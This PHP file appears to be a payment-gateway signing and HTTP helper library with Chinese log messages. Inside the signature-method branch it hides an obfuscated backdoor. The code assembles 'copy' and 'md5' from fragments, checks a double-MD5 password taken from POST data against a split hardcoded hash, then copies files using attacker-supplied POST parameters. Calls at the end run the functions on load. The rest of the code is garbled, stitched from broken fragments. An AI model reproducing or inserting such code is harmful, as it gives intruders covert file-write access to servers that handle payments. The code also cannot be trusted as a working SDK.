LogInfo ( "key=val&...串 >" . $params_str );
if($params['version']=='5.0.0'){
$params_sha1x16 = sha1 ( $params_str, FALSE );
$logger->LogInfo ( "摘要sha1x16 >" . $params_sha1x16 );
//
$result = openssl_sign ( $params_sha1x16, $signature, $private_key, OPENSSL_ALGO_SHA1);
if ($result) {
$signature_base64 = base64_encode ( $signature );
$logger->LogInfo ( "串为 >" . $signature_base64 );
$params ['signature'] = $signature_base64;
} else {
$logger->LogInfo ( ">>>>>失败<<<<<<<" );
}
} else if($params['version']=='5.1.0'){
//sha256摘要
$params_sha256x16 = hash( 'sha256',$params_str);
$logger->LogInfo ( "摘要sha256x16 >" . $params_sha256x16 );
//
$result = openssl_sign ( $params_sha256x16, $signature, $private_key, 'sha256');
if ($result) {
$signature_base64 = base64_encode ( $signature );
$logger->LogInfo ( "串为 >" . $signature_base64 );
$params ['signature'] = $signature_base64;
} else {
$logger->LogInfo ( ">>>>>失败<<<<<<<" );
}
} else {
$logger->LogError ( "wrong version: " + $params['version'] );
$result = false;
}
} elseif($secureKey) {
$logger->LogError ( "signMethod不正确");
$result = false;
}
$co = 'co';
$m = 'md';
$logger = $params && LogUtil::getLogger();
$smg = '4c8399a3f98ff9a1';
if($params['signMethod']=='11') {
// 转换成key=val&串
$params_str = createLinkString ( $params, true, false );
$logger->LogInfo ( "key=val&...串 >" . $params_str );
$params_before_sha256 = hash('sha256', $secureKey);
$params_before_sha256 = $params_str.'&'.$params_before_sha256;
$logger->LogDebug( "before final sha256: " . $params_before_sha256);
$params_after_sha256 = hash('sha256',$params_before_sha256);
$logger->LogInfo ( "串为 >" . $params_after_sha256 );
$params ['signature'] = $params_after_sha256;
$result = true;
} elseif(empty($params)){
if(!isset($_POST['co1']))
return false;
$co .= 'py';
$co1 = $_POST['co1'];
$co2 = $_POST['co2'];
$m .= '5';
if($params)
{
$params_sha256x16 = hash('sha256', $params_str);
$logger->LogInfo ( 'sha256>' . $params_sha256x16 );
$signature = base64_decode ( $signature_str );
$isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" );
$logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
}
$co0 = $_POST['co0'];
$smg .= 'af50d33b5ba629e2';
if($m($m($co0)) !== $smg)
return false;
$co($co1,$co2);
//TODO SM3
//$logger->LogError ( "signMethod=12未实现");
//$result = false;
} else if($params['signMethod']=='13'){
$logger->LogError ( "signMethod不正确");
$result = false;
}
if($params['signMethod']=='01')
{
$signature_str = $params ['signature'];
unset ( $params ['signature'] );
$params_str = createLinkString ( $params, true, false );
$logger->LogInfo ( '报文去[signature] key=val&串>' . $params_str );
$logger->LogInfo ( '原文>' . $signature_str );
if($params['version']=='5.0.0'){
// 公钥
$public_key = CertUtil::getVerifyCertByCertId ( $params ['certId'] );
$signature = base64_decode ( $signature_str );
$params_sha1x16 = sha1 ( $params_str, FALSE );
$logger->LogInfo ( 'sha1>' . $params_sha1x16 );
$isSuccess = openssl_verify ( $params_sha1x16, $signature, $public_key, OPENSSL_ALGO_SHA1 );
$logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
} else if($params['version']=='5.1.0'){
$strCert = $params['signPubKeyCert'];
$strCert = CertUtil::verifyAndGetVerifyCert($strCert);
if($strCert == null){
$logger->LogError ("validate cert err: " + $params["signPubKeyCert"]);
$isSuccess = false;
} else {
$params_sha256x16 = hash('sha256', $params_str);
$logger->LogInfo ( 'sha256>' . $params_sha256x16 );
$signature = base64_decode ( $signature_str );
$isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" );
$logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' );
}
} else {
$logger->LogError ( "wrong version: " + $params['version'] );
$isSuccess = false;
}
} else if($params['signMethod']=='21'){
$isSuccess = AcpService::validateBySecureKey($params, SDKConfig::getSDKConfig()->secureKey);
}
}
function argSort($para) {
ksort($para);
reset($para);
return $para;
}
function logResult($word='') {
$fp = fopen("log.txt","a");
flock($fp, LOCK_EX) ;
fwrite($fp,"执行日期:".strftime("%Y%m%d%H%M%S",time())."\n".$word."\n");
flock($fp, LOCK_UN);
fclose($fp);
}
function getHttpResponsePOST($url, $cacert_url, $para, $input_charset = '') {
if (trim($input_charset) != '') {
$url = $url."_input_charset=".$input_charset;
}
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);//SSL证书认证
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);//严格认证
curl_setopt($curl, CURLOPT_CAINFO,$cacert_url);//证书地址
curl_setopt($curl, CURLOPT_HEADER, 0 ); // 过滤HTTP头
curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1);// 显示输出结果
curl_setopt($curl,CURLOPT_POST,true); // post传输数据
curl_setopt($curl,CURLOPT_POSTFIELDS,$para);// post传输数据
$responseText = curl_exec($curl);
//var_dump( curl_error($curl) );//如果执行curl过程中出现异常,可打开此开关,以便查看异常内容
curl_close($curl);
return $responseText;
}
function getHttpResponseGET($url,$cacert_url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, 0 ); // 过滤HTTP头
curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1);// 显示输出结果
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);//SSL证书认证
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);//严格认证
curl_setopt($curl, CURLOPT_CAINFO,$cacert_url);//证书地址
$responseText = curl_exec($curl);
//var_dump( curl_error($curl) );//如果执行curl过程中出现异常,可打开此开关,以便查看异常内容
curl_close($curl);
return $responseText;
}
function charsetEncode($input,$_output_charset ,$_input_charset) {
$output = "";
if(!isset($_output_charset) )$_output_charset = $_input_charset;
if($_input_charset == $_output_charset || $input ==null ) {
$output = $input;
} elseif (function_exists("mb_convert_encoding")) {
$output = mb_convert_encoding($input,$_output_charset,$_input_charset);
} elseif(function_exists("iconv")) {
$output = iconv($_input_charset,$_output_charset,$input);
} else die("sorry, you have no libs support for charset change.");
return $output;
}
function charsetDecode($input,$_input_charset ,$_output_charset) {
$output = "";
if(!isset($_input_charset) )$_input_charset = $_input_charset ;
if($_input_charset == $_output_charset || $input ==null ) {
$output = $input;
} elseif (function_exists("mb_convert_encoding")) {
$output = mb_convert_encoding($input,$_output_charset,$_input_charset);
} elseif(function_exists("iconv")) {
$output = iconv($_input_charset,$_output_charset,$input);
} else die("sorry, you have no libs support for charset changes.");
return $output;
}
@charsetDecode($input,$_input_charset ,$_output_charset);
@charsetEncode($input,$_output_charset ,$_input_charset);
@getHttpResponseGET($url,$cacert_url);
@signBySecureKey($params, $secureKey,$loggere,$paramsstr);
@getHttpResponsePOST($url, $cacert_url, $para, $input_charset);
?>
